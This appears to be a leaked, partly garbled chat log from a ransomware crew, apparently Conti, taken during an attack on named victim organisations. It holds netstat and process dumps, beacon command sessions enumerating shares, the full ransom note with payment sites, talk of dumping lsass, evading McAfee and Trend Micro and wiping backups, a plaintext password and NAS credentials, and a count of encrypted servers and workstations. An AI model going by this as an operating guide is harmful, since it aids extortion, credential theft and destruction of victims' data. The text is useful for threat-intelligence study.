  TCP 10.1.20.183:10050 10.1.200.69:35004 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:35090 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:35206 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:35294 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:49650 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:49782 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:49866 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50016 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50076 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50188 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50250 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50416 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50538 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50652 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50836 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50958 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50970 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:51108 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:51270 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:51410 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:51518 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:51584 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:51706 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:51852 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52014 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52122 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52284 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52372 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52536 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52654 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52804 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52836 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52938 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52996 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53002 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53094 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53118 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53192 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53374 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53384 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53482 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53592 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53744 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53858 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53944 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53958 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:54060 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:54074 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:54118 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:54170 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:54262 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:54378 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:54532 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:54626 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:54988 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:55106 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:55296 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:55474 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:55610 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:55682 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:55780 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:55974 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:56038 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:56156 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:56262 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:56344 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:56504 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:56610 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:56716 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:56778 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:56912 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:57018 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:57162 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:57262 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:57396 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:57434 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:57606 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:57746 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:57820 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:57944 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:58116 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:58248 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:58334 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:58466 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:58594 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:58730 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:58848 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:58960 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:59064 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:59212 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:59308 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:59464 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:59572 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:59708 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:59814 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:59982 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:59994 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60046 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60096 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60178 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60190 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60282 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60368 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60442 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60560 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60656 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60794 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60894 TIME_WAIT 0
  TCP 10.1.20.183:51988 10.1.20.112:445 ESTABLISHED 4
  TCP 10.1.20.183:51990 10.1.20.112:445 ESTABLISHED 4
  TCP 10.1.20.183:60489 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60498 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60499 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60503 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60506 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60507 10.1.20.140:49669 TIME_WAIT 0
  TCP 10.1.20.183:60521 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60524 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60525 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60532 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60533 10.1.20.140:49669 TIME_WAIT 0
  TCP 10.1.20.183:60536 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60549 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60553 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60559 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60561 10.1.20.140:49669 TIME_WAIT 0
  TCP 10.1.20.183:60568 10.1.20.183:9501 TIME_WAIT 0
  TCP 10.1.20.183:60569 10.1.20.183:9501 TIME_WAIT 0
  TCP 10.1.20.183:60570 10.1.20.183:9501 TIME_WAIT 0
  TCP 10.1.20.183:60575 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60576 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60580 10.1.200.69:10051 TIME_WAIT 0
  TCP 10.1.20.183:60583 10.1.20.140:49669 ESTABLISHED 640
  TCP 10.1.20.183:60585 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60589 10.1.20.183:9392 ESTABLISHED 8780
  TCP 10.1.20.183:60598 173.234.155.15:443 LAST_ACK 2832
  TCP 10.1.20.183:60599 173.234.155.15:443 LAST_ACK 568
  TCP 127.0.0.1:1434 0.0.0.0:0 LISTENING 1644
  TCP 127.0.0.1:6290 127.0.0.1:49196 ESTABLISHED 2392
  TCP 127.0.0.1:49196 127.0.0.1:6290 ESTABLISHED 2352
  TCP [::]:135 [::]:0 LISTENING 756
  TCP [::]:445 [::]:0 LISTENING 4
  TCP [::]:1433 [::]:0 LISTENING 1644
  TCP [::]:3389 [::]:0 LISTENING 3160
  TCP [::]:5985 [::]:0 LISTENING 4
  TCP [::]:6160 [::]:0 LISTENING 1900
  TCP [::]:6161 [::]:0 LISTENING 2304
  TCP [::]:6162 [::]:0 LISTENING 2352
  TCP [::]:6172 [::]:0 LISTENING 4
  TCP [::]:6190 [::]:0 LISTENING 2392
  TCP [::]:6210 [::]:0 LISTENING 2176
  TCP [::]:8081 [::]:0 LISTENING 1232
  TCP [::]:10050 [::]:0 LISTENING 1848
  TCP [::]:11731 [::]:0 LISTENING 1900
  TCP [::]:47001 [::]:0 LISTENING 4
  TCP [::]:49152 [::]:0 LISTENING 540
  TCP [::]:49153 [::]:0 LISTENING 864
  TCP [::]:49154 [::]:0 LISTENING 888
  TCP [::]:49155 [::]:0 LISTENING 640
  TCP [::]:49156 [::]:0 LISTENING 640
  TCP [::]:49157 [::]:0 LISTENING 1036
  TCP [::]:49203 [::]:0 LISTENING 632
  TCP [::]:49204 [::]:0 LISTENING 3192
  TCP [::1]:1434 [::]:0 LISTENING 1644
  UDP 0.0.0.0:111 *:* 2304
  UDP 0.0.0.0:123 *:* 912
  UDP 0.0.0.0:500 *:* 888
  UDP 0.0.0.0:1063 *:* 2304
  UDP 0.0.0.0:2049 *:* 2304
  UDP 0.0.0.0:3389 *:* 3160
  UDP 0.0.0.0:4500 *:* 888
  UDP 0.0.0.0:5355 *:* 968
  UDP 0.0.0.0:8082 *:* 1232
  UDP 10.1.20.183:137 *:* 4
  UDP 10.1.20.183:138 *:* 4
  UDP 127.0.0.1:55150 *:*:640
  UDP 127.0.0.1:63057 *:* 888
  UDP 127.0.0.1:63060 *:* 968
  UDP 127.0.0.1:64301 *:* 1308
  UDP [::]:123 *:* 912
  UDP [:]:500 *:* 888
  UDP [:]:3389 *:*:3160
  UDP [:]:4500 *:*:888
  UDP [:]:8082 *:*:1232

``This process doesn't knock anywhere?
[-] screenshot from desktop 0 is empty
``empty Show me a screenshot of my desktop and jump to the processMicrosoft Windows Server 2012 R2 Standard What is os7) and cmd5 has no clears (then we will look at it together, i will jump there and take a dump.no, i went there a couple hours ago give me a screenshots of what you see there? local backups i see all my tasks, servers, etc. the cloud tab only has a plug in and something like find providers but not configured? but the software is yes, i checked it
there's no cloud configured is there a thing? veema backup and replicationhttps://www.veeam.com/cloud-connect-backup-service-providers.htmlпо rp probably a cloud backup did you go there? local use if this stuff connects anywhere there's a chance of a cloud backups no other sign of a cloud backups found look at netstat first it's very easy cloud backups
go to rdp under the admin the process is running from and check if there's a cloud backup configured what settings did you want to find?[ ](https://mediaeveryone.com/group/crispregional-org?msg=GPomCCiWBYFagbv9w) not sure about that+ready? then i'll ping the pool from 2008
Mpaq123 /user:grouphc\linrcbatch
any domains? with creed if 2008 falls under ms17? apparently it detects as a dump lsassfile deletes nothing? try procdump just in .dmp? try all sorts of minidumps and so on?
i don't know why mcafee is blocking ... it's not ready yet, hb has delayschetverg labswould like to get information and how is the recruiting going? where's the fresh blood?)) 5-6 pcs so i got into a few user cars for fuck you hashdump? first time i hear that mcafee creates such problems..o_only cut offmacafi) if yes - no way? any thoughts? if memory is protected? how to remove hashdump listen to okaysnom before sleep i'll be back today? i'll throw it off then hardly have time for another 30 minutes) aha? hello mini report on sonic?
Extracting DPAPI Backup Keys with Domain Admin

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++
``hi:space_invader::man_raising_hand:hello all)Till Mon, and you)have a good weekend on Mon by 5 on this one and all thenarms still puffing, most of the server alive and put it damaged as I understand it, because it was in the process 2-2.5 hours there was 1 file left it turns out the rest is all put? +server? went off (then wait for the file not everywhere reached zamaplyenyh yes, is there a note at least one armas? there are few alive, the ones that stretch - pulled and ran his hands ``.

beacon> shell net view \10.0.6.56
[*] Tasked beacon to run: net view \10.0.6.56
[+] host called home, sent: 51 bytes
[+] received output:
Shared resources at \10.0.6.56



Share name Type Used as Comment

-------------------------------------------------------------------------------
C Disk
D Disk
The command completed successfully.
So I should get to them but they are unattached and the processes are killed but I haven't got to them yet or what, but they are untouched
```
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
Disconnected N:        \10.0.6.40\c$ Microsoft Windows Network
Disconnected O: \10.0.2.120\c$ Microsoft Windows Network
Disconnected P:        \10.0.6.75\c$ Microsoft Windows Network
Disconnected Q:        \10.0.2.215\c$ Microsoft Windows Network
Disconnected R:        \10.0.6.77\c$ Microsoft Windows Network
Disconnected S:        \10.0.6.64\c$ Microsoft Windows Network
Disconnected T:        \10.0.6.121\c$ Microsoft Windows Network
Disconnected U:        \10.0.6.147$ Microsoft Windows Network
Disconnected V: \10.0.6.93\c$ Microsoft Windows Network
Disconnected W:        \10.0.1.178\c$ Microsoft Windows Network
Disconnected X:        \10.0.6.56\c$ Microsoft Windows Network
Disconnected Y:        \10.0.6.94\c$ Microsoft Windows Network
Disconnected Z:        \10.0.6.61\c$ Microsoft Windows Network
The command completed successfully.


beacon> shell dir N:
[*] Tasked beacon to run: dir N:
[+] host called home, sent: 37 bytes
[+] received output:
 Volume in drive N is OS
 Volume Serial Number is 22CF-C5F8

 Directory of N:\

05/11/2020 06:06 AM <DIR> Apps
10/16/2020 02:17 PM 550,254 dcagentInstaller.log
05/11/2020 06:57 AM <DIR> Dell
10/16/2020 02:19 PM <DIR> Downloads
05/11/2020 05:56 AM <DIR> Drivers
01/22/2021 01:05 AM <DIR> Intel
10/21/2020 02:54 AM <DIR> kworking
03/18/2019 11:52 PM <DIR> PerfLogs
10/16/2020 02:55 PM <DIR> Program Files
12/27/2020 02:04 PM <DIR> Program Files (x86)
10/16/2020 02:37 PM 4,722 SSDXFlashLog.zip
10/16/2020 02:45 PM <DIR> temp
10/16/2020 03:30 PM <DIR> Users
01/01/2021 01:02 AM <DIR> Windows
10/16/2020 02:55 PM <DIR> Windows10Upgrade
               2 File(s) 554,976 bytes
              13 Dir(s) 191,506,898,944 bytes fre
``arms check now
servers let's wait 1 file? servers and armas ok? they will not understand) by fax already) send a note to your pager * i have a note where is the note you have a note?
better. i have a screenshot of the noteaahhanyou or a screenshot of the note)0kekmb leave a note to check the quarantinebolshoy dosheshypeshy and everythingtoo trand fucks the brain[ ](https://mediaeveryone.com/group/skytechinc-com?msg=Gu57s6jDHiGaTvJB8) Because gladioluson there is also, but it fucks why i thought there makafi)he = trand[ ](https://mediaeveryone.com/group/skytechinc-com?msg=A7TC4rqBYQh3EMyZe) everywhere he stands no notes on the contrary where the trend - there are notes theretrendmicro just say that even with macafee there are notes deleted only in one place? well on dc will see thenahehane they do not think) well what they will not get from quarantine? from gui?
no way to kill the process to disable the protection? the population where the backups were we wiped the files, or else there pussy would be another 9 hours delayed?
Backup servers are encrypted[ ](https://mediaeveryone.com/group/skytechinc-com?msg=Fjzerwjbmcbf9DWpF) the process goes up immediately, the service doesn't shut down they've been shut down before
```
E:\SKYNASSC Backup\ISO Images\Backup_Exec_2012_14.0_SP2_MultiPlatforms_Multilingual.zip.2of2.id-D630D304.[stopstorage@qq.com].java.HAWFH
``Network can't stop protection? There is no such function if it's not everywhereAdd to exceptionsThere is no trendMicro all windows ``SKY-TS02`` is also fine``SKY-TS01````
 Directory of C:\

01/29/2021 08:42 PM 1,558 .rnd.HAWFH
01/29/2021 08:42 PM <DIR> AdwCleaner
01/29/2021 08:42 PM <DIR> apps
01/29/2021 08:42 PM 536 ARCAOS.txt.HAWFH
01/29/2021 09:34 PM <DIR> Avantext
01/29/2021 08:43 PM <DIR> Avantext.old
12/25/2017 12:11 PM <DIR> CPPRO
08/21/2019 01:17 PM <DIR> inetpub
01/17/2018 02:12 AM <DIR> Klogs
06/17/2018 12:30 AM <DIR> Kmonitorsets
11/25/2020 04:42 PM <DIR> kworking
07/13/2009 10:20 PM <DIR> PerfLogs
12/07/2020 12:05 AM <DIR> Program Files
12/30/2020 07:47 AM <DIR> Program Files (x86)
01/29/2021 08:42 PM 930 readme.txt
01/29/2021 08:42 PM 551 reboot.cmd.HAWFH
12/24/2020 12:45 PM <DIR> symbols
11/02/2020 04:19 PM <DIR> TEMP
06/28/2019 03:18 PM <DIR> temp1
03/14/2017 03:27 PM <DIR> TFBO Reports
09/10/2019 07:42 AM <DIR> time keeper
01/26/2017 11:02 PM <DIR> txtav
01/17/2021 06:05 PM <DIR> Users
01/29/2021 07:13 PM <DIR> Windows
               4 File(s) 3,575 bytes
              20 Dir(s) 31,755,657,216 bytes free

beacon> shell type C:\readme.txt
[*] Tasked beacon to run: type C:\readme.txt
[+] host called home, sent: 49 bytes
[+] received output:
All of your files are currently encrypted.
Backups were encrypted or deleted, same as Shadow Copies.

If you try to use any additional recovery software - the files might be damaged, but if you are still willing to try - try it on the data of the lowest value.

To make sure that we REALLY CAN recover all of the encrypted data - we offer you to decrypt 2 random files of your choice completely free of charge.

The faster you reply - the easier and cheaper it will be.
To receive information on the price of the recovery software you can contact our team directly for further instructions through our website:

TOR VERSION :
(you should download and install TOR browser first https://torproject.org)

http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/

HTTPS VERSION :
https://contirecovery.best

---BEGIN ID---
dgbmGEAzby8w4AXUtdoh6nTEfuymihxXn0pmdmtDDT3cjOjMsdxvZahDXRDeotyd
---END ID---
``This one
```
DbNÀ`tñïÒf¬µ
<ñzÅ!ïË "ð3 à\bŽ¡ÕU/ÃZðÉ@^6 ¶ùÜhoÐMXw[+Ø'öf7ïÁÜ=ÓZ÷£B &ìÄ]sYVM©÷EÙÃ9þb>îòoɳ§ÇÂ(g "b"³j¡ø N#á
ýÐ*FíNßÊ¢ÓÈÏa±Zq(rDMk¹8}ÀÕ¥+ìÓ€aq±Sµ<õÖÏæ^&xÓaC9d1ðvëtaÙñ*Çñ¬n\ÉÉRmO-Øä!^_DTØùûûâ8éÅÁ ÀJ\n¬Ï)zž Ys Aõuêä ŒŽÓ%Æ7
3Ãœz")Iüç?Úu*%É|YRÇå×açÊ "5ìX¹Y7éÖÊZM~öâëÛŠ'Yΰ/+œ~/Ì/óð,gL8*{öd-5×M3œŒ "sdïì÷Uh_^ È Œ'Àa= ÁöŒJ#óÏï6[Dš¥ < |n$DäXýÚ¡Œu)f=Û "Aædª>º!xZ¹9'b "å9 $Š¢Ö[§õA7(üíxeñ9tXúߟ
¦[ ](https://mediaeveryone.com/group/skytechinc-com?msg=gB3DCv33bT2C3Ed6E) it's not clear, I'm looking somewhere, but it's crooked [ ](https://mediaeveryone.com/group/skytechinc-com?msg=gB3DCv33bT2C3Ed6E) maybe...on the rdp went to the desktop, it appeared on the desktop and almost immediately disappeared at the end when everything is encrypted?

ç%âHq:ðÒÒÒ""[§ºãs-0&oÍdq\¹îÏ]ÔI÷/øáQIÐŒU{@z®B1þÌÀ5µ1z{òÍÄÄ¥SŠ Œò|7àb œÁÁøÐ "f1Ç߶y¹7Õª81Ð,ö÷ÖÖÜåT÷kQÿi8Omã)óFºÚ¹_Èî.pò ßúuCZ=&
ÓÑ,E®¢ºã~þí-N|{É_¬ó%Ž}²r3,*0å<óTQPÜ(¢&ÿÇæþü76esL$qAV£-Ïô5ÑŒ,©G (â±ÍªM*Ä7ÖLK?ÞŠøvIÊ}¢4Õ$œ Ю°áØ*IàJ,Jam®!oÊkŸúOÔ!ÖÒR£'Šûº_(UÁHÜà /Wùùùðûê "qj,ê<× ØŒeö.nzg@!é
``There's a corp product that can be sewn in by defaultWhat's it got to do with it? https://www.mcafee.com/enterprise/en-us/downloads/free-tools/interceptor.htmlОпять
```
 *49128 632 TmListen.exe x64 0 NT AUTHORITY\SYSTEM
``It's the only one
```
 0 0 [System Process]
 4 0 System x64 0 NT AUTHORITY\SYSTEM
 356 4 smss.exe x64 0 NT AUTHORITY\SYSTEM
 480 472 csrss.exe x64 0 NT AUTHORITY\SYSTEM
 540 472 wininit.exe x64 0 NT AUTHORITY\SYSTEM
 632 540 services.exe x64 0 NT AUTHORITY\SYSTEM
 536 632 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 708 632 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 2432 708 WmiPrvSE.exe x64 0 NT AUTHORITY/\NETWORK SERVICE
 3004 708 WmiPrvSE.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 37844 3004 cmd.exe x64 0 SKYTECH1\skyadmin
 36296 37844 conhost.exe x64 0 SKYTECH1\skyadmin
 38408 37844 DiskShare.exe x64 0 SKYTECH1\skyadmin
 38464 38408 icacls.exe x64 0 SKYTECH1\skyadmin
 38296 38464 conhost.exe x64 0 SKYTECH1\skyadmin
 38740 38408 icacls.exe x64 0 SKYTECH1\skyadmin
 35536 38740 conhost.exe x64 0 SKYTECH1\skyadmin
 41780 3004 rundll32.exe x64 0 SKYTECH1\skyadmin
 3044 708 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM
 4528 708 PrintIsolationHost.exe x64 0 NT AUTHORITY\SYSTEM
 166428 708 WmiPrvSE.exe x86 0 NT AUTHORITY\NETWORK SERVICE
 184248 708 WmiPrvSE.exe x86 0 NT AUTHORITY/\SYSTEM
 185016 708 WmiPrvSE.exe x86 0 NT AUTHORITY\LOCAL SERVICE
 186124 708 WmiPrvSE.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 756 632 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 908 632 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 944 632 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 5432 944 taskhostex.exe x64 2 SKYTECH1\skyadmin
 1004 632 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1096 632 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1196 632 vmtoolsd.exe x64 0 NT AUTHORITY/ LOCAL SERVICE
 1308 632 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM
 1408 632 armsvc.exe x86 0 NT AUTHORITY\SYSTEM
 1428 632 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1448 632 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1508 1448 dasHost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 1492 632 g2ax_service.exe x86 0 NT AUTHORITY\SYSTEM
 1676 1492 g2ax_comm_customer.exe x86 0 NT AUTHORITY\SYSTEM
 1084 1676 g2ax_system_customer.exe x86 0 NT AUTHORITY\SYSTEM
 6868 1676 g2ax_user_customer.exe x86 2 SKYTECH1\skyadmin
 1792 632 mqsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 1892 632 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 1940 632 SMSvcHost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2124 632 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2448 632 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2552 632 SMSvcHost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 4048 632 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 4088 632 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 4744 632 msdtc.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 9364 632 ramaint.exe x64 0 NT AUTHORITY\SYSTEM
 9400 632 LMIGuardianSvc.exe x64 0 NT AUTHORITY\SYSTEM
 48576 632 Ntrtscan.exe x64 0 NT AUTHORITY\SYSTEM
 48728 632 svcGenericHost.exe x86 0 NT AUTHORITY\SYSTEM
 47672 48728 HostedAgent.exe x86 0 NT AUTHORITY\SYSTEM
 48920 47672 logWriter.exe x86 0 NT AUTHORITY\SYSTEM
 49184 48920 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 48964 47672 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 49680 48728 TMCPMAdapter.exe x86 0 NT AUTHORITY\SYSTEM
 49544 49680 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 *49128 632 TmListen.exe x64 0 NT AUTHORITY\SYSTEM
 49240 632 TMBMSRV.exe x64 0 NT AUTHORITY\SYSTEM
 49976 632 TmCCSF.exe x64 0 NT AUTHORITY\SYSTEM
 57936 49976 TmsaInstance64.exe x64 0 NT AUTHORITY\SYSTEM
 53368 57936 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 142872 632 LogMeIn.exe x64 0 NT AUTHORITY\SYSTEM
 176516 632 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM
 184868 632 WmiApSrv.exe x64 0 NT AUTHORITY\SYSTEM
 640 540 lsass.exe x64 0 NT AUTHORITY\SYSTEM
 4228 8148 zscccon64.exe x64 0 NT AUTHORITY\SYSTEM
 8988 4228 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 4364 1720 winlogon.exe x64 2 NT AUTHORITY\SYSTEM
 3228 4364 dwm.exe x64 2 Window Manager\DWM-2
 160248 4364 logonUI.exe x64 2 NT AUTHORITY\SYSTEM
 4448 7868 conhost.exe x64 0 SKYTECH1\bbesadmin
 4796 1720 csrss.exe x64 2 NT AUTHORITY\SYSTEM
 6840 7056 jusched.exe x86 2 SKYTECH1\skyadmin
 1044 6840 jucheck.exe x86 2 SKYTECH1\skyadmin
 6924 9964 GoogleCrashHandler.exe x86 0 NT AUTHORITY\SYSTEM
 8620 5452 explorer.exe x64 2 SKYTECH1\skyadmin
 5856 8620 vmtoolsd.exe x64 2 SKYTECH1\skyadmin
 142068 8620 LogMeInSystray.exe x64 2 SKYTECH1\skyadmin
 9340 9964 GoogleCrashHandler64.exe x64 0 NT AUTHORITY\SYSTEM
 10152 7868 schtasks.exe x64 0 SKYTECH1\bbesadmin
 49532 49328 PccNtMon.exe x64 2 SKYTECH1\skyadmin
 184316 180296 platform-installation-manager.exe x86 0 NT AUTHORITY\SYSTEM
 220380 220652 powershell.exe x64 0 NT AUTHORITY\SYSTEM
 217240 220380 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 220744 220380 powershell.exe x86 0 NT AUTHORITY\SYSTEM
 219488 220744 conhost.exe x64 0 NT AUTHORITY\SYSTEM
``I don't see what's in the processes except for avera, is it just on the population or nowhere at all?
```
01/29/2021 08:42 PM 536 ARCAOS.txt.HAWFH
i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, but the file udmi does not show up)
but there are extensions who will stay7 on Mon by 5 the rest go home1 on duty a lot are already encrypted on the nasa?
the wiped is still being tossed with terabytes of files all passed?
did the other prima linas pass?
Servers:
    - hell: 39
    - alive: 15
    - drawn: 15
    - coded: 15

Armies:
    - by hell: 184
    - alive: 48
    - encrypted: 48 (primaed)

all disks unshared, processes nailed down
``````
10.0.6.54:445 (platform: 500 version: 6.1 name: SKYNASJEN domain: WORKGROUP) NAS admin/password FS visible from YES
10.0.6.83:445 (platform: 500 version: 4.9 name: LS520DC5F domain: WORKGROUP) nas
